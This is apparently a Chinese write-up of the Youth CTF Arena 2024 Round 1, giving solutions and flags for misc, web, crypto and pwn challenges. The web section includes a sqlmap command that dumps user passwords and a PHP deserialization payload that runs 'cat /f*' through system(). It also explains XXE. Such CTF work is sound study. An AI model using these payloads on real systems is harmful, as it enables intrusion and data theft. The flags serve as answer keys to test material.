青少年CTF擂台挑战赛2024#Round1WP
青少年CTF擂台挑战赛2024#Round1WP
hihopkcmisc
CTFer Revenge
首先把他reverse一下
然后变成一个zip
爆破后密码为z12345
qsnctf{b414e3e3a6449ddba0997db259203eb7}
追光者
Hint1:数形结合
hint2:查找是个好东西
首先压缩包伪加密
追光者的请求.txt
有些人你看着挺正常的,吃饭睡觉,打打CTF,聊天大笑,其实心里边早就死透了……
我追寻光明,可我看不到一点光明,你能帮我找到光吗?
追光者.jpg末尾
5o+Q56S677ya5a+G56CB5Lit55qE5a2X56ym5YWo5Li65bCP5YaZ
解码后
“提示:密码中的字符全为小写”
然后foremost追光者.jpg
里面有个zip
人们不愿意相信光是AB,人们更愿意相信光是AD。人们也不愿意相信,密码就在眼前,因为人们只愿相信自己愿意相信的,只愿看到自己想看到的……
所以在原先的追光者.jpg搜索AB
iam5thplay
但是输入密码不对?根据别人wp可得iam5thplayer
#光.txt
三哈师傅说过:
“其实打ctf的最大乐趣就是挑战未知,挑战自己不知道的东西,做不出来也正常,毕竟出题人可能也是绞尽脑汁,千方百计弄点新的东西出来,就算最厉害的web手,也不敢说自己所有比赛都能做出来,只要努力去逼近自己意志极限,你过程有多痛苦,那么你做出来的时候就有多快乐。就算做不出来也没关系,比赛完成后,认真复现一下,我相信,这个题,这个考点,这个姿势,你会铭记一辈子,这其实才是真正的ctf内涵,真正的极客精神呢”我的CTF价值观
1.摆正心态很重要:适度CTF益脑,沉迷CTF伤身
2.没有什么CTF是必须打的CTF
3.成绩固然重要,但比成绩更重要的是,感受CTF带给你的知识收获、友谊与成长谢谢你帮我找到了在我生命中最温暖的光,但是这束光太过耀眼,我只看清了一半
qsnctf{NE73R
给了一半flag
压缩后发现crc32一样
所以我们就进行明文攻击
这是为啥,后面查到还是用bandzip跟出题人一样的解压工具吧
G3r1ing!
纵然世间黑暗,仍有一点星光。
}o1U_3V1G_
qsnctf{NE73R_G1V3_U1o}
多情
多情自古空余恨,此恨绵绵无绝期。
首先010editor发现尾部插入了一个图片,手撕或者foremost
发现kali打不开
然后爆破宽高
996
得到996,打开之前的压缩包发现只有0和1,将996转化成二进制得到1111100100。刚好对应压缩包中01的数量,进行替换得到一串带&#字符
1 | Lrp5mJcdEbbv2bnf6HQSNh |
qsnctf{Lrp5mJcdEbbv2bnf6HQSNh}
小光的答案之书
小光是一个具有很强的好奇心的孩子,他总是热衷于探索世界,寻找各种问题的答案。快来https://bbs.qsnctf.com/thread-533-1-1.html寻找答案吧!
对照圣堂武士密码(猪圈密码升级版)解码得到LIFE
LIFE,大写不对,小写对了
https://bbs.qsnctf.com/thread-534-1-1.html
关注公众号:中学生CTF,关键词:青少年CTF2024
qsnctf{49e7bd5efe114cd2d93ef60ddb2f8714}
ez_model
从Pytorch开始的AI之路
can_can_need_computer
呜呜呜呜我的电脑被队里的web手黑掉了,她更改了我电脑中的一些文件名并且留下了后门来威胁我,你能帮我救回我的电脑吗
Web
EasyMD5
php没有难题
随便传一个文件
Not a PDF! angry!!!!!! get out from my page
上传pdf
do you konw what is MD5 Collision?
估计要md5碰撞
- QNKCDZO
- 240610708
然后改为pdf
qsnctf{7950702b10a540978915470c019a9e5c}
PHP的后门
PHP竟然也会有后门这种东西?你知道吗!
抓包看响应头
https://cloud.tencent.com/developer/article/1839234
PHP的XXE
XXE(XML External Entity)是一种针对XML解析器的攻击技术,也被称为XML外部实体注入攻击。当应用程序解析用户提供的XML输入时,如果没有正确地配置或过滤外部实体,攻击者可以利用这一漏洞执行恶意操作。
XML允许在文档中定义和使用外部实体,这些实体可以从外部资源(如文件、网络URL等)中获取数据。如果应用程序解析了包含恶意外部实体的XML输入,并且未对外部实体进行适当的处理或限制,攻击者可能会读取敏感文件、执行远程代码或进行其他恶意活动。
php7.0.30
https://blog.csdn.net/weixin_45808483/article/details/122000030
1 | GET /simplexml_load_string.php |
Easy_SQLi
弱口令admin 123456
1 | python sqlmap.py -r "D:\UserData\Desktop\1.txt" --batch -D qsnctf -T users -C password --dump |
1 | Database: qsnctf |
雏形系统
今天是公司里的工程师小王被裁员的日子,但小王并没有闲着。在离开之前,他突发奇想,决定留下一份特别的礼物给公司,于是他设计了一个登录页面的雏形。
扫出来为/www.zip
下载后为
eval换成echo,然后内容替代eval
1 | $a = new wo(); |
最后payload
1 | username=O:2:"wo":3:{s:3:"sex";s:3:"boy";s:3:"age";s:8:"eighteen";s:9:"intention";O:3:"shi":2:{s:4:"next";O:4:"Demo":0:{}s:4:"pass";s:7:"cat /f*";}}&password=system |
crypto
解个方程
欢迎来到青少年CTF,领取你的题目,进行解答吧!这是一道数学题!!
p = 288299858297525337395934332789289425161
q = 222488721608984752459883471652539879597
e = 65537
d = ?
1 | import gmpy2 |
qsnctf{030c91ccb75e4a199a64dcd4102d10d4}
四重加密
1 | OFZW4Y3UMY====== |
1 | zcye{mxmemtxrzt_lzbha_kwmqzec}|key=hello |
维吉尼亚
1 | synt{yqitbfqnoi_xsxwp_wpifoqv} |
qsnctf{ldvgosdabv_kfkjc_jcvsbdi}
Pwn
简单的数学题
qsnctf{0ada718f6df74f4c9a580c9911c1efcd}